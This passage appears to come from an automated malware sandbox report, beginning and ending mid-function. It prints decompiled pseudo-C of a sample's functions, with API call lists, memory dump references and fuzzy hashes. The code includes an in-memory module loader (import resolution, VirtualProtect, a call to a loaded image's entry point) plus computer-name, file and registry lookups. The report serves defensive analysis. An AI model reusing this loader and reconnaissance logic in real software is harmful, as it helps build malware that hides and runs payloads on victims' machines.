				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x001d59ff
0x001d5a02
0x001d5a12
0x001d5a1b
0x001d5a1f
0x001d5aed
0x001d5af3
0x001d5af3
0x001d5a39
0x001d5a3e
0x001d5a42
0x001d5a48
0x001d5a4d
0x001d5a54
0x001d5a63
0x001d5a63
0x001d5a67
0x001d5a69
0x001d5a75
0x001d5a80
0x001d5a8b
0x001d5a8f
0x001d5a99
0x001d5a9d
0x001d5a9f
0x001d5aa4
0x001d5aab
0x001d5abb
0x001d5abb
0x001d5aa4
0x001d5a9d
0x001d5abd
0x001d5ac2
0x001d5ac7
0x001d5ac7
0x001d5aca
0x001d5ad3
0x001d5ad8
0x001d5ad8
0x001d5add
0x001d5ae2
0x001d5ae2
0x001d5add
0x001d5a67
0x001d5ae4
0x001d5aea
0x00000000

APIs

Part of subcall function 001D907D: SysAllocString.OLEAUT32(80000002), ref: 001D90DA
Part of subcall function 001D907D: SysFreeString.OLEAUT32(00000000), ref: 001D9140

SysFreeString.OLEAUT32(?), ref: 001D5AD8
SysFreeString.OLEAUT32(001D4010), ref: 001D5AE2

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 0ae61056e9c33d8bbbe6e1b21e5940c7113e95a926b6e09f7719b63a9c304195
Instruction ID: c3c73649bebdb82efa134f104dc8923966405775cc960eb5e0bb0cf092c03a06
Opcode Fuzzy Hash: 0ae61056e9c33d8bbbe6e1b21e5940c7113e95a926b6e09f7719b63a9c304195
Instruction Fuzzy Hash: B2313976600529AFCB11DF98C888C9BBB7AFFC9740714465AF8159B210E731DD91DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E241424, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E241424() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x6e244144;
				if( *0x6e24412c > 5) {
					_t16 = _t15 + 0x6e2450f9;
				} else {
					_t16 = _t15 + 0x6e2450b1;
				}
				E6E2410BC(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E6E241A26( &_v32,  &_v16,  *0x6e244140 ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x6e244138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E6E241352(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x6e244138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E6E242032(_t44, _t32 + 4);
						}
					}
					_t25 = E6E241699(_v28); // executed
				}
				ExitThread(_t25);
			}

0x6e24142a
0x6e24143b
0x6e241445
0x6e24143d
0x6e24143d
0x6e24143d
0x6e24144c
0x6e241455
0x6e24145a
0x6e241478
0x6e2414d4
0x6e24147a
0x6e241480
0x6e241486
0x6e241494
0x6e241498
0x6e24149f
0x6e2414a8
0x6e2414ac
0x6e2414b2
0x6e2414c3
0x6e2414b4
0x6e2414ba
0x6e2414ba
0x6e2414b2
0x6e2414cb
0x6e2414cb
0x6e2414d6

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 6E241480
ExitThread.KERNEL32 ref: 6E2414D6

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: b3f3c9c7fa74f62a993e4ee658d76b7bd8eaea101f56c02d2ae2e011aaec50cf
Instruction ID: d7b74c41736f2584a1ad28428d110950dd1cce7b0d3bc18a4e23aab35ff85279
Opcode Fuzzy Hash: b3f3c9c7fa74f62a993e4ee658d76b7bd8eaea101f56c02d2ae2e011aaec50cf
Instruction Fuzzy Hash: 6511BE7210460EDFDB16EFE5C848E8777EEAB06304F010915E558D7190EB70E498CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001D3F0E, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E001D3F0E(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E001D7E20(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E001DA5FA(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x001d3f13
0x001d3f1e
0x001d3f20
0x001d3f26
0x001d3f28
0x001d3f2d
0x001d3f36
0x001d3f3a
0x001d3f43
0x001d3f47
0x001d3f56
0x001d3f49
0x001d3f4a
0x001d3f4f
0x001d3f4f
0x001d3f47
0x001d3f3a
0x001d3f5f

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,001D29CE,74B5F710,00000000,?,?,001D29CE), ref: 001D3F26

Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C

GetComputerNameExA.KERNELBASE(00000003,00000000,001D29CE,001D29CF,?,?,001D29CE), ref: 001D3F43

Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 33ac2529ad797046058411f81378a7626e10e620ad1057bd044e94f95428c948
Instruction ID: 243656fe086109931eb900768ca172f50282bc7348340cdc924879d0c3817e5f
Opcode Fuzzy Hash: 33ac2529ad797046058411f81378a7626e10e620ad1057bd044e94f95428c948
Instruction Fuzzy Hash: D3F09037A0010AAAEB11D79ADC00EAF6BBCDBC0700F110056B918D3280EB70EF018662

Uniqueness

Uniqueness Score: -1.00%

Function 001D6456, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x1dd23c) == 0) {
						E001D469F();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x1dd23c) == 1) {
						_t10 = E001D523A(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x001d645d
0x001d645e
0x001d6461
0x001d6493
0x001d6495
0x001d6495
0x001d6463
0x001d6464
0x001d6479
0x001d6480
0x001d6482
0x001d6482
0x001d6480
0x001d6464
0x001d649d

APIs

InterlockedIncrement.KERNEL32(001DD23C), ref: 001D646B

Part of subcall function 001D523A: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,001D647E,?), ref: 001D524D

InterlockedDecrement.KERNEL32(001DD23C), ref: 001D648B

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 483fcc3514291438ed83c465d0cab0cdace5aeffde536f01ec7e3d83a9ee04e9
Instruction ID: eef629a94fca62a6dc2eae405c5c8e32da44e4ed1d689ede73e0c2e0b48cd90a
Opcode Fuzzy Hash: 483fcc3514291438ed83c465d0cab0cdace5aeffde536f01ec7e3d83a9ee04e9
Instruction Fuzzy Hash: C9E086352C6222A3D72127749C0475EA741AB71799F01891FF486D1390C720DCC0D6D1

Uniqueness

Uniqueness Score: -1.00%

Function 6E277FA0, Relevance: 1.7, APIs: 1, Instructions: 161COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(000000FF,6E2CB428,0000311C,00000040,6E2C9B0C), ref: 6E278058

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 75b9d9ea45c702e07089079525561a67c6f51e6cf4e01e87130c30df609aa9e9
Instruction ID: a1e582854bca625b96c46d89573d95dd9aa2b686df78d7d56fd599bbbd57d549
Opcode Fuzzy Hash: 75b9d9ea45c702e07089079525561a67c6f51e6cf4e01e87130c30df609aa9e9
Instruction Fuzzy Hash: 8681EF70D08918DBCF18CF6DC99CA25BBA3BF4A30C3048A2AE64987345D6F4A484CF74

Uniqueness

Uniqueness Score: -1.00%

Function 001D497C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E001D497C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x1dd2a4; // 0x2dca5a8
				_t4 = _t15 + 0x1de39c; // 0x2fa8944
				_t20 = _t4;
				_t6 = _t15 + 0x1de124; // 0x650047
				_t17 = E001D59F9(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E001D7E65(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x001d4986
0x001d498d
0x001d498e
0x001d498f
0x001d4990
0x001d4996
0x001d499b
0x001d499b
0x001d49a5
0x001d49b7
0x001d49be
0x001d49ec
0x001d49c0
0x001d49c2
0x001d49c7
0x001d49e9
0x001d49c9
0x001d49cc
0x001d49d3
0x001d49d8
0x001d49da
0x001d49da
0x001d49df
0x001d49df
0x001d49c7
0x001d49f3

APIs

Part of subcall function 001D59F9: SysFreeString.OLEAUT32(?), ref: 001D5AD8

Part of subcall function 001D7E65: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,001D1459,004F0053,00000000,?), ref: 001D7E6E
Part of subcall function 001D7E65: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,001D1459,004F0053,00000000,?), ref: 001D7E98
Part of subcall function 001D7E65: memset.NTDLL ref: 001D7EAC

SysFreeString.OLEAUT32(00000000), ref: 001D49DF

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: c19e77d35dd895209090da0d7602eef9384fec839af8037c82fc9c7553361e3a
Instruction ID: f0512ff9666c5be5aead976cba1cc2e359eaadf3b3ec2337de0b7cbcb81b2352
Opcode Fuzzy Hash: c19e77d35dd895209090da0d7602eef9384fec839af8037c82fc9c7553361e3a
Instruction Fuzzy Hash: 2001713650112ABFDF25AFA9CC019ABBBB9FB08354F010466F944E7261E3709D52C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E281BB1, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6E28173D,?), ref: 6E281BC6

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 483b2f35660c5bdd1962abfe5b0416df88a4bd157d6527bbd394ccbcaad989ab
Instruction ID: 979237c94ca83251f38fa3d8fdcc203498a54548063c7a51e60539beca9bf256
Opcode Fuzzy Hash: 483b2f35660c5bdd1962abfe5b0416df88a4bd157d6527bbd394ccbcaad989ab
Instruction Fuzzy Hash: 66D02E32950B085ADB004EB2A80CB623BDDC386BA6F004832B90CC6080F6B0C084CA10

Uniqueness

Uniqueness Score: -1.00%

Function 6E2410BC, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E2410BC(void* __eax, intOrPtr _a4) {

				 *0x6e244150 =  *0x6e244150 & 0x00000000;
				_push(0);
				_push(0x6e24414c);
				_push(1);
				_push(_a4);
				 *0x6e244148 = 0xc; // executed
				L6E2410E2(); // executed
				return __eax;
			}

0x6e2410bc
0x6e2410c3
0x6e2410c5
0x6e2410ca
0x6e2410cc
0x6e2410d0
0x6e2410da
0x6e2410df

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E241451,00000001,6E24414C,00000000), ref: 6E2410DA

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: d938f83e9c4193f638fe24f424c6fc5de47722adc42318572eecd0593dd4b988
Instruction ID: aa256b7d81c75e77a3c09c269a97cf69c6176281e93fd7d686aeac8e3d7a8aa7
Opcode Fuzzy Hash: d938f83e9c4193f638fe24f424c6fc5de47722adc42318572eecd0593dd4b988
Instruction Fuzzy Hash: 9AC04CF8150784E7EB25AFC0CC49F457B537761705F654504F618252C083F51059C525

Uniqueness

Uniqueness Score: -1.00%

Function 6E2830B2, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMT ref: 6E2830B4

Part of subcall function 6E283040: RtlEncodePointer.NTDLL(00000000,?,6E2830B9,00000000,6E286D8F,6E2CB748,00000000,00000314,?,6E282D8E,6E2CB748,6E2AF8D0,00012010), ref: 6E2830A7

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: EncodePointer__encode_pointer
String ID:
API String ID: 4150071819-0
Opcode ID: eb08a0bf7b6e8c3d7dc2c6ad7d3a54e248f4a5f833920566f578a1624b4a0c82
Instruction ID: f72adfadcf089c0e06255bea16268a7781b1895133ffda6bd4711a94e519fdd4
Opcode Fuzzy Hash: eb08a0bf7b6e8c3d7dc2c6ad7d3a54e248f4a5f833920566f578a1624b4a0c82
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6E241699, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E241699(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e244140;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e244140 - 0x63698bc4 &  !( *0x6e244140 - 0x63698bc4);
				_t18 = E6E24150D( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e244140 - 0x63698bc4 &  !( *0x6e244140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e244140 - 0x63698bc4 &  !( *0x6e244140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E241000(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t29 = E6E2417FA(_t40, _t44);
						if(_t29 == 0) {
							_t26 = E6E241E32(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E24133D(_t42);
					L8:
					return _t29;
				}
			}

0x6e2416a1
0x6e2416a3
0x6e2416bf
0x6e2416d0
0x6e2416d7
0x6e241735
0x00000000
0x6e2416d9
0x6e2416d9
0x6e2416e3
0x6e2416e7
0x6e2416ec
0x6e2416f4
0x6e2416f8
0x6e2416fd
0x6e241702
0x6e241706
0x6e24170b
0x6e24170c
0x6e241710
0x6e241715
0x6e24171d
0x6e24171d
0x6e241715
0x6e241706
0x6e2416f8
0x6e24171f
0x6e241728
0x6e24172c
0x6e241736
0x6e24173c
0x6e24173c

APIs

Part of subcall function 6E24150D: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E2416D5,?,?,?,?,?,00000002,?,6E2414D0), ref: 6E241531
Part of subcall function 6E24150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E241553
Part of subcall function 6E24150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E241569
Part of subcall function 6E24150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E24157F
Part of subcall function 6E24150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E241595
Part of subcall function 6E24150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E2415AB

Part of subcall function 6E241000: memcpy.NTDLL(?,?,?), ref: 6E241037
Part of subcall function 6E241000: memcpy.NTDLL(?,?,?), ref: 6E24106C

Part of subcall function 6E2417FA: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6E241832

Part of subcall function 6E241E32: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E241E6B
Part of subcall function 6E241E32: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E241EE0
Part of subcall function 6E241E32: GetLastError.KERNEL32 ref: 6E241EE6

GetLastError.KERNEL32(?,6E2414D0), ref: 6E241717

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: b7208e218090d8fb1511ddedd1cdc4af0ee0a5b2aed4150457dfb7c0bf60c95a
Instruction ID: c6e06acaa46a78a842ffb3dd80640ff24b826b6543ea401182b2fbc6b5d3ea08
Opcode Fuzzy Hash: b7208e218090d8fb1511ddedd1cdc4af0ee0a5b2aed4150457dfb7c0bf60c95a
Instruction Fuzzy Hash: 62112E7A60070AEBC7159BE9CC84DDB77BEAF442197040514EA0297645D7F0EE5E87A0

Uniqueness

Uniqueness Score: -1.00%

Function 001D67C4, Relevance: 1.3, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001D67C4(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x1dd330;
				E001D9186();
				while(1) {
					_t8 = E001D4C3B(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E001D1546(_t14);
					if(_t15 == 0) {
						HeapFree( *0x1dd238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E001D9186();
					if(_t19 != 0) {
						_t22 =  *0x1dd338; // 0x2fa9b70
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}

0x001d67cc
0x001d67d0
0x001d67d1
0x001d67d2
0x001d67d7
0x001d67dc
0x001d67e3
0x001d67ea
0x00000000
0x00000000
0x001d67ec
0x001d67f1
0x001d67f2
0x001d67f9
0x001d6813
0x00000000
0x001d67fb
0x001d67fb
0x001d67fd
0x001d6800
0x001d6804
0x00000000
0x00000000
0x001d6806
0x001d6804
0x001d681b
0x001d681b
0x001d681d
0x001d6824
0x001d6826
0x001d682c
0x001d6833
0x001d6843
0x001d683b
0x001d683e
0x001d683e
0x001d6846
0x001d6846
0x001d684f
0x001d684f
0x001d6819
0x00000000

APIs

Part of subcall function 001D9186: GetProcAddress.KERNEL32(36776F57,001D67DC), ref: 001D91A1

Part of subcall function 001D4C3B: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 001D4C66
Part of subcall function 001D4C3B: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 001D4C88
Part of subcall function 001D4C3B: memset.NTDLL ref: 001D4CA2
Part of subcall function 001D4C3B: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 001D4CE0
Part of subcall function 001D4C3B: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D4CF4
Part of subcall function 001D4C3B: CloseHandle.KERNEL32(00000000), ref: 001D4D0B
Part of subcall function 001D4C3B: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 001D4D17
Part of subcall function 001D4C3B: lstrcat.KERNEL32(?,642E2A5C), ref: 001D4D58
Part of subcall function 001D4C3B: FindFirstFileA.KERNELBASE(?,?), ref: 001D4D6E

Part of subcall function 001D1546: lstrlen.KERNEL32(?,00000000,001DD330,00000001,001D67F7,001DD00C,001DD00C,00000000,00000005,00000000,00000000,?,?,?,001D41AA,001D5D90), ref: 001D154F
Part of subcall function 001D1546: mbstowcs.NTDLL ref: 001D1576
Part of subcall function 001D1546: memset.NTDLL ref: 001D1588

HeapFree.KERNEL32(00000000,001DD00C,001DD00C,001DD00C,00000000,00000005,00000000,00000000,?,?,?,001D41AA,001D5D90,001DD00C,?,001D5D90), ref: 001D6813

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: FileHeap$Allocatememset$AddressCloseCreateFindFirstFreeHandleProcTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 172136534-0
Opcode ID: 110883b9ab8f9c4c18e5d85b39f931f69f8578a0581d73e35fb7ef2f7717ccce
Instruction ID: 91e9ee853fe8a51f3d71d1576cdcf2eaa9ac01d68e5c98b6b89c443afbd8e12d
Opcode Fuzzy Hash: 110883b9ab8f9c4c18e5d85b39f931f69f8578a0581d73e35fb7ef2f7717ccce
Instruction Fuzzy Hash: 7E016436600305BBEB005FE6DD80B7A7BAAEB913A0F50003BF940CA360C7649C81B360

Uniqueness

Uniqueness Score: -1.00%

Function 001D4B9D, Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001D4B9D(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E001D5AF6(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x1dd238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E001D497C(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x001d4b9d
0x001d4ba5
0x001d4bbc
0x001d4bd7
0x001d4bdb
0x001d4be0
0x001d4be2
0x001d4bf4
0x001d4c00
0x001d4be4
0x001d4be4
0x001d4be9
0x001d4bee
0x001d4bee
0x001d4be2
0x001d4c06
0x001d4c0a
0x001d4c0a
0x001d4bb1
0x001d4bb6
0x001d4bba
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 001D497C: SysFreeString.OLEAUT32(00000000), ref: 001D49DF

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,001D57D8,?,004F0053,02FA9388,00000000,?), ref: 001D4C00

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 8c45bfe206910f3c48433e54fce6b8612897a160e19671e86417c9965d188278
Instruction ID: 5d171b13dc1aeb60b282482cfc9d3709842cf0b0d8d9ca4e23323efe440b1e8f
Opcode Fuzzy Hash: 8c45bfe206910f3c48433e54fce6b8612897a160e19671e86417c9965d188278
Instruction Fuzzy Hash: D0011D72501529BBCF22DF98CC01FEA7BA5EF58790F05812AFE099A261D731D960DBD0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001D696A, Relevance: 9.2, APIs: 6, Instructions: 223
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E001D696A(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0x1dd2a0; // 0x63699bc3
				if(E001DA4D4( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x1dd2d4 = _v12;
				}
				_t25 =  *0x1dd2a0; // 0x63699bc3
